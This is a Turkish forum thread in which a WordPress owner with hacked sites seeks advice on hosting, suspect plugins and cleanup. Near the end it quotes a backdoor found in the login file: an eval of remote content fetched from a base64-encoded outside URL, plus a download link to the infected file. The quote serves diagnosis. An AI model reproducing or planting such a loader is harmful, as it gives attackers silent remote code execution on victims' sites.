Benimde sitem hacklenmişti bir kaç defa hosting firmasını değiştirdim sorun düzeldi. Veridyen'i öneririm size ilgililer ve herhangi bir hack olayı yaşamadım şuana kadar.
10+ sitem mevcut ve şu an kullandığım firmada da yaklaşık 1 yıllık hizmetim bulunuyor. Eğer sıkıntı firma ise tabi değiştiririm ama değilse boş yere masraf olmasa iyi olur.
Rica etsem eski firmanızı mesajla iletir misiniz?
--R10.NET; Flood Engellendi -->-> Yeni yazılan mesaj 19:59:34 -->-> Daha önceki mesaj 19:57:01 --
Gözüme çarpan pek olmadı ama Eklenti Yapımcısı Türkçe Olan bi Eklenti varsa onu silmenizi veya ismini yazmanızı rica ediyorum. bu kodların açıklamaları türkçe yazılmış çünki.
Ayrıca Sitenizi sık sık Kontrol Ediin, Böyle Dosyalar barındırıyorsa anında silmenizi tavsiye ediyorum. Daha kapsamlı bir güvenlik için hosting sağlayıcınıza ticket atarak yardım isteyebilirsiniz. Yardımcı olurlar diye düşünüyorum.
Sadece "Sağlık Hesaplama Eklentisi"'nin yapımcısı Türk ama o da diğer sitemde yok.
Acaba bu eklentilerde bulunan bazı açıkları fark eden birisi girerek bu dosyayı atmış olabilir mi diye düşünüyorum.
--R10.NET; Flood Engellendi -->-> Yeni yazılan mesaj 20:02:20 -->-> Daha önceki mesaj 19:59:34 --
Backdoor enfekte edilen kodların açıklamaları Türkçe, bu sebeple aşağıdaki eklentilerden şüphelendim açıkçası. Fakat dediğim gibi herhangi bir tema ve ya eklenti açığından faydalanarak exploit ile de eklenmiş olabilir.
Sağlık Hesaplama Eklentisi
Kırık Bağlantı Bildirici
Kırık Bağlantı Bildirici, Broken Checker eklentisi.
Sanırım Türkçe çeviri olduğu için o şekilde görünüyor.
Çok teşekkürler ilginize.
Rica etsem büyük olduğu için buraya kodlayamadığım [
http://s8.dosya.tc/server5/lpjo16/user.rar.html bu dosyaya da bakabilir misiniz?
/**
* Fires after the user has successfully logged in.
*
* @since 1.5.0
*
* @param string $user_login Username.
* @param WP_User $user WP_User object of the logged-in user.
*/
eval(file_get_contents(base64_decode('aHR0cDovL3lh a2FsYWRpbXNpemkuY29tL3dwX2JhY2t1cC93cC50eHQ=')));
do_action( 'wp_login', $user->user_login, $user );
return $user;
}
/**
gibi bir kod barındırıyor. Orjinal dosyada göremedim.